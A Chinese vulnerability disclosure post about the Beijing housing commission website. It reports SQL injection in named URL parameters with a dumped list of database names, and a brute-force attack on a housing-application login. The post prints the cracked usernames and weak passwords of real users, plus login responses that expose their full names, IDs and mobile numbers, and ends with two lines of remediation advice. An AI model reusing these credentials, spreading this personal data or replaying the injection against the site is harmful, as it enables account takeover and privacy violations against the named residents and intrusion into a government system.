首页 » 漏洞 » 北京市住建委漏洞打包(主站两处注入/可爆破获取用户信息)

北京市住建委漏洞打包(主站两处注入/可爆破获取用户信息)

 
code 区域
http://**.**.**.**/tabid/2159/Default.aspx?ModelKey=SendInfo&Contract_qyh=Y1741851&Contract_mf=%E5%BC%A0%E6%A1%82%E8%8A%AC&Contract_Password=666666

Contract_qyh和Contract_Password

两个参数存在注入

上一个是Contract_mf注入点,由于没有进一步测试,所以上次就发了一个,经过测试其他两个也存在注入

北京市住建委漏洞打包(主站两处注入/可爆破获取用户信息)

北京市住建委漏洞打包(主站两处注入/可爆破获取用户信息)

code 区域
available databases [20]:

[*] application

[*] bjfdc

[*] bjfdc_for_auditburea

[*] bjfdc_tax

[*] bjhouse

[*] bjhouse_application

[*] bjrema

[*] datacenter

[*] figure

[*] jianceshi

[*] master

[*] model

[*] msdb

[*] policyhouse

[*] real_estate_analyse

[*] real_estate_analyse_bak

[*] real_estate_analyseImportdata

[*] tempdb

[*] ttib

[*] vk

漏洞证明:

code 区域
http://**.**.**.**/enroll/home.jsp

自住型商品房网上申购系统,验证码没什么用,大量用户弱口令,仅测试top500用户名,密码采用

123456,111111,000000,用户名等

code 区域
413lironglirong200falsefalse546

352zhangjingzhangjing200falsefalse547

159wangningwangning200falsefalse549

329wanglongwanglong200falsefalse551

379liuyuyingliuyuying200falsefalse551

478zhangkunzhangkun200falsefalse551

76wangyulanwangyulan200falsefalse553

400zhanglijuanzhanglijuan200falsefalse553

404liguixiangliguixiang200falsefalse554

270wangshuzhenwangshuzhen200falsefalse557

173zhangfengyingzhangfengying200falsefalse559

1041lixia123456200falsefalse543

1312lixiumei123456200falsefalse552

686chenfang111111200falsefalse553

1943wangjinfeng000000200falsefalse556

1075zhangguiying123456200falsefalse560

北京市住建委漏洞打包(主站两处注入/可爆破获取用户信息)

code 区域
{"flag":1,"message":"登录成功!","data":{"id":"54016","people_name":"李蓉","username":"lirong","email":"287084850@**.**.**.**","mobile":"15510318399"},"redirectUrl":null}

{"flag":1,"message":"登录成功!","data":{"id":"12033","people_name":"张晶","username":"zhangjing","email":"6032561@**.**.**.**","mobile":"13801623808"},"redirectUrl":null}

{"flag":1,"message":"登录成功!","data":{"id":"46993","people_name":"王宁","username":"wangning","email":"casio0018@**.**.**.**","mobile":"13521143322"},"redirectUrl":null}

{"flag":1,"message":"登录成功!","data":{"id":"30169","people_name":"王龙","username":"wanglong","email":"wl_post@**.**.**.**","mobile":"13810447522"},"redirectUrl":null}

修复方案:

注入问题content_在内部可能还别的地方,多查看一下

第二个系统把验证码处理一下,另外提醒用户修改密码

原文链接:北京市住建委漏洞打包(主站两处注入/可爆破获取用户信息),转载请注明来源!

0